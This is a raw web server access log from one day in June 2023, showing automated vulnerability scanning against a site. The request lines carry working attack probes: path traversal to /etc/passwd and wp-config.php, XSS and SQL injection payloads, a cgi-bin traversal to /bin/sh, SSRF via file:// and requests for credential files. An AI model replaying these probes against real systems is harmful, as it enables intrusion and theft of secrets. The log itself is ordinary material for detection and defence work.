107.189.31.184 - - [17/Jun/2023:06:40:02 +0530] "GET /boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1 HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:06:40:02 +0530] "GET /boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1 HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:06:40:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:06:42:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:42:54 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:42:56 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:42:57 +0530] "GET /.tugboat HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:06:42:57 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:42:58 +0530] "GET /.tugboat HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:06:42:59 +0530] "GET null null" 400 -
83.97.73.89 - - [17/Jun/2023:06:43:35 +0530] "GET /console/ HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:06:45:35 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:45:38 +0530] "GET /index HTTP/1.1" 404 1004
107.189.31.184 - - [17/Jun/2023:06:45:39 +0530] "GET /index HTTP/1.1" 404 1004
83.97.73.89 - - [17/Jun/2023:06:46:17 +0530] "GET /console/ HTTP/1.1" 404 1010
41.186.73.134 - - [17/Jun/2023:06:46:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:06:47:26 +0530] "GET /_ignition/execute-solution HTTP/1.1" 404 1046
107.189.31.184 - - [17/Jun/2023:06:47:35 +0530] "GET /authenticationserverservlet HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:06:47:36 +0530] "GET /authenticationserverservlet HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:06:48:10 +0530] "GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1110
107.189.31.184 - - [17/Jun/2023:06:48:11 +0530] "GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1110
83.97.73.89 - - [17/Jun/2023:06:49:17 +0530] "GET /_ignition/execute-solution HTTP/1.1" 404 1046
41.186.73.134 - - [17/Jun/2023:06:50:20 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:50:28 +0530] "GET /conf/nginx.conf HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:06:50:28 +0530] "GET /conf/nginx.conf HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:06:50:35 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:50:35 +0530] "POST /index.php HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:51:16 +0530] "GET /templates/config/profmanage.php HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:06:51:17 +0530] "GET /templates/config/profmanage.php HTTP/1.1" 404 1056
41.186.73.134 - - [17/Jun/2023:06:51:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:51:38 +0530] "GET /backend/admin/users?username=anonymous HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:06:51:38 +0530] "GET /backend/admin/users?username=anonymous HTTP/1.1" 404 1032
83.97.73.89 - - [17/Jun/2023:06:53:21 +0530] "GET / HTTP/1.1" 200 11250
83.97.73.89 - - [17/Jun/2023:06:54:31 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:06:55:00 +0530] "GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1088
107.189.31.184 - - [17/Jun/2023:06:55:01 +0530] "GET /%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1088
41.186.73.134 - - [17/Jun/2023:06:55:08 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:55:32 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../etc/passwd%00&option=com_picasa2gallery HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:55:33 +0530] "GET /index.php?controller=../../../../../../../../../../../../../../etc/passwd%00&option=com_picasa2gallery HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:06:56:12 +0530] "OPTIONS / HTTP/1.1" 405 1086
107.189.31.184 - - [17/Jun/2023:06:56:13 +0530] "OPTIONS / HTTP/1.1" 405 1086
41.186.73.134 - - [17/Jun/2023:06:56:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:06:56:37 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:56:37 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:06:58:29 +0530] "GET /?filename=/../../../../../../../../../../../../etc/passwd&option=com_helpdeskpro&original_filename=AnyFileName.exe&task=ticket.download_attachment HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:06:58:30 +0530] "GET /?filename=/../../../../../../../../../../../../etc/passwd&option=com_helpdeskpro&original_filename=AnyFileName.exe&task=ticket.download_attachment HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:06:59:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:07:01:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:07:02:20 +0530] "GET / HTTP/1.1" 200 11250
83.97.73.89 - - [17/Jun/2023:07:02:28 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:04:36 +0530] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:07:04:36 +0530] "POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1" 404 1054
107.189.31.184 - - [17/Jun/2023:07:04:48 +0530] "POST /sws/app/gnb/login/login.jsp HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:07:04:48 +0530] "POST /sws/app/gnb/login/login.jsp HTTP/1.1" 404 1048
41.186.73.134 - - [17/Jun/2023:07:04:53 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:05:36 +0530] "POST /rails/actions?action=Run%20pending%20migrations&error=ActiveRecord::PendingMigrationError&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:07:05:37 +0530] "POST /rails/actions?action=Run%20pending%20migrations&error=ActiveRecord::PendingMigrationError&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:07:06:07 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:06:19 +0530] "GET /payform.php?note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&price=123&t=1&type=upgrade&upgradegd=6&upgradeid=1 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:07:06:19 +0530] "GET /payform.php?note=%3C/textarea%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&price=123&t=1&type=upgrade&upgradegd=6&upgradeid=1 HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:07:06:57 +0530] "GET /oauth-credentials.json HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:07:06:58 +0530] "GET /oauth-credentials.json HTTP/1.1" 404 1038
83.97.73.89 - - [17/Jun/2023:07:07:06 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:07:07:37 +0530] "GET /dispatcher/invalidate.cache HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:07:07:37 +0530] "GET /dispatcher/invalidate.cache HTTP/1.1" 404 1048
83.97.73.89 - - [17/Jun/2023:07:07:38 +0530] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 -
45.128.232.141 - - [17/Jun/2023:07:08:12 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
217.219.45.27 - - [17/Jun/2023:07:08:23 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:08:53 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:08:55 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_hsconfig HTTP/1.1" 404 1012
90.151.171.108 - - [17/Jun/2023:07:09:01 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:07:09:01 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:07:09:01 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:07:09:02 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:07:09:06 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.108 - - [17/Jun/2023:07:09:07 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:07:09:07 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:07:09:07 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:07:09:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:07:10:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:11:41 +0530] "GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:07:11:42 +0530] "GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:07:14:02 +0530] "GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1126
107.189.31.184 - - [17/Jun/2023:07:14:03 +0530] "GET /wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1126
41.186.73.134 - - [17/Jun/2023:07:14:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:07:14:17 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:14:40 +0530] "GET /labkey/__r1/login-login.view?returnUrl=http://interact.sh HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:07:14:40 +0530] "GET /labkey/__r1/login-login.view?returnUrl=http://interact.sh HTTP/1.1" 404 1050
83.97.73.89 - - [17/Jun/2023:07:15:06 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:07:15:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:15:28 +0530] "GET /pme/media/ HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:07:15:29 +0530] "GET /pme/media/ HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:07:16:30 +0530] "GET /sap/public/info HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:07:16:31 +0530] "GET /sap/public/info HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:07:18:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
79.61.63.131 - - [17/Jun/2023:07:19:03 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 400 -
83.97.73.89 - - [17/Jun/2023:07:19:17 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:07:19:24 +0530] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:07:19:24 +0530] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:07:19:32 +0530] "USER anonymous " 400 -
107.189.31.184 - - [17/Jun/2023:07:19:33 +0530] "USER anonymous " 400 -
83.97.73.89 - - [17/Jun/2023:07:19:40 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:07:19:47 +0530] "GET /manager/html HTTP/1.1" 401 2473
198.98.50.108 - - [17/Jun/2023:07:19:56 +0530] "CONNECT myipb1a.mrrage.xyz:80 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:07:20:28 +0530] "GET /_debugbar/open?max=20&offset=0 HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:07:20:28 +0530] "GET /_debugbar/open?max=20&offset=0 HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:07:20:45 +0530] "GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1" 404 1090
107.189.31.184 - - [17/Jun/2023:07:20:45 +0530] "GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1" 404 1090
41.186.73.134 - - [17/Jun/2023:07:22:59 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:07:24:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
83.97.73.89 - - [17/Jun/2023:07:24:05 +0530] "GET /geoserver HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:25:37 +0530] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:07:25:38 +0530] "GET /pages/setup.php?defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 404 1024
83.97.73.89 - - [17/Jun/2023:07:25:50 +0530] "GET /geoserver HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:26:25 +0530] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:26:27 +0530] "GET /index.php?download=/etc/passwd HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:07:27:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:27:25 +0530] "GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:07:27:26 +0530] "GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1" 404 1020
41.186.73.134 - - [17/Jun/2023:07:28:26 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:07:28:30 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:07:29:31 +0530] "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:07:29:32 +0530] "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 1048
107.189.31.184 - - [17/Jun/2023:07:32:03 +0530] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1076
107.189.31.184 - - [17/Jun/2023:07:32:03 +0530] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 404 1076
41.186.73.134 - - [17/Jun/2023:07:32:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:32:26 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:32:27 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:07:33:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:34:24 +0530] "GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:07:34:26 +0530] "GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1" 404 1084
107.189.31.184 - - [17/Jun/2023:07:34:26 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:07:34:28 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:07:34:45 +0530] "GET /wp-content/themes/Attitude/go.php?https://interact.sh/ HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:07:34:46 +0530] "GET /wp-content/themes/Attitude/go.php?https://interact.sh/ HTTP/1.1" 404 1060
107.189.31.184 - - [17/Jun/2023:07:34:53 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:07:34:53 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:07:36:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:36:37 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:36:39 +0530] "POST /j_spring_security_check HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:07:36:39 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:36:41 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:07:36:42 +0530] "POST /j_spring_security_check HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:07:36:44 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:07:37:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:38:12 +0530] "GET /.git-credentials HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:07:38:13 +0530] "GET /.git-credentials HTTP/1.1" 404 1026
90.151.171.106 - - [17/Jun/2023:07:40:06 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:07:40:06 +0530] "CONNECT api.ipify.org:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:07:40:11 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:07:40:11 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:07:40:16 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:07:40:16 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
216.218.206.84 - - [17/Jun/2023:07:40:21 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:07:40:21 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:07:40:21 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:07:40:48 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:40:59 +0530] "GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:07:40:59 +0530] "GET /e/ViewImg/index.html?url=javascript:alert(document.domain) HTTP/1.1" 404 1034
41.186.73.134 - - [17/Jun/2023:07:41:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:42:21 +0530] "GET /css/eonweb.css HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:07:42:21 +0530] "GET /css/eonweb.css HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:07:42:25 +0530] "GET /__ HTTP/1.1" 404 998
107.189.31.184 - - [17/Jun/2023:07:42:26 +0530] "GET /__ HTTP/1.1" 404 998
107.189.31.184 - - [17/Jun/2023:07:43:30 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:07:43:32 +0530] "GET /images/..%2finfo.html HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:07:45:17 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:07:46:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:46:55 +0530] "GET /wp-admin/admin-post.php?local-destination-id=/etc/passwd&local-download=/etc/passwd&page=pb_backupbuddy_destinations HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:07:46:56 +0530] "GET /wp-admin/admin-post.php?local-destination-id=/etc/passwd&local-download=/etc/passwd&page=pb_backupbuddy_destinations HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:07:47:22 +0530] "GET /env.js HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:07:47:24 +0530] "GET /env.development.js HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:07:47:26 +0530] "GET /env.production.js HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:07:47:27 +0530] "GET /env.js HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:07:47:28 +0530] "GET /env.test.js HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:07:47:29 +0530] "GET /env.development.js HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:07:47:31 +0530] "GET /env.production.js HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:07:47:31 +0530] "GET /env.dev.js HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:07:47:33 +0530] "GET /env.test.js HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:07:47:33 +0530] "GET /env.prod.js HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:07:47:35 +0530] "GET /env.dev.js HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:07:47:37 +0530] "GET /env.prod.js HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:07:48:54 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:07:48:55 +0530] "POST /admin/ajax.php?action=login HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:07:48:56 +0530] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:07:48:57 +0530] "GET /admin/view_car.php?id=-1%20union%20select%201,md5(999999999),3,4,5,6,7,8,9,10--+ HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:07:49:39 +0530] "GET /Default.aspx HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:07:49:39 +0530] "GET /Default.aspx HTTP/1.1" 404 1018
41.186.73.134 - - [17/Jun/2023:07:49:46 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:07:50:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:53:12 +0530] "POST /fpui/loginServlet HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:07:53:12 +0530] "POST /fpui/loginServlet HTTP/1.1" 404 1028
41.186.73.134 - - [17/Jun/2023:07:53:57 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:54:59 +0530] "GET /NCFindWeb?filename=../../ierp/bin/prop.xml&service=IPreAlertConfigService HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:55:00 +0530] "GET /NCFindWeb?filename=../../ierp/bin/prop.xml&service=IPreAlertConfigService HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:07:55:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:07:55:30 +0530] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:55:30 +0530] "GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:07:56:09 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:07:56:09 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:07:58:45 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:08:00:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:00:13 +0530] "GET /api/geojson?url=file:///etc/passwd HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:08:00:14 +0530] "GET /api/geojson?url=file:///etc/passwd HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:08:02:03 +0530] "GET /gateway/routes HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:08:02:04 +0530] "GET /gateway/routes HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:08:02:05 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:08:02:06 +0530] "GET /actuator/gateway/routes HTTP/1.1" 404 1040
41.186.73.134 - - [17/Jun/2023:08:03:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:03:52 +0530] "GET /index.php?_=1355714673828&ajax=true&p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:08:03:53 +0530] "GET /index.php?_=1355714673828&ajax=true&p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:08:04:41 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:08:08:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:08:52 +0530] "POST /wp-json/pie/v1/login HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:08:08:52 +0530] "POST /wp-json/pie/v1/login HTTP/1.1" 404 1034
107.189.31.184 - - [17/Jun/2023:08:08:59 +0530] "GET /codeception.yml HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:08:08:59 +0530] "GET /codeception.yml HTTP/1.1" 404 1024
41.186.73.134 - - [17/Jun/2023:08:09:23 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:11:16 +0530] "GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1100
107.189.31.184 - - [17/Jun/2023:08:11:17 +0530] "GET /wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1100
41.186.73.134 - - [17/Jun/2023:08:12:52 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:08:13:27 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:08:14:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:15:39 +0530] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 1050
107.189.31.184 - - [17/Jun/2023:08:15:39 +0530] "GET /cgi-bin/ExportAllSettings.sh HTTP/1.1" 404 1050
41.186.73.134 - - [17/Jun/2023:08:17:21 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:08:17:41 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:08:17:42 +0530] "GET / HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:08:18:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:08:19:23 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:08:19:23 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:08:19:23 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:08:19:23 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:08:19:28 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:08:19:28 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:08:19:28 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:08:19:28 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:08:20:42 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
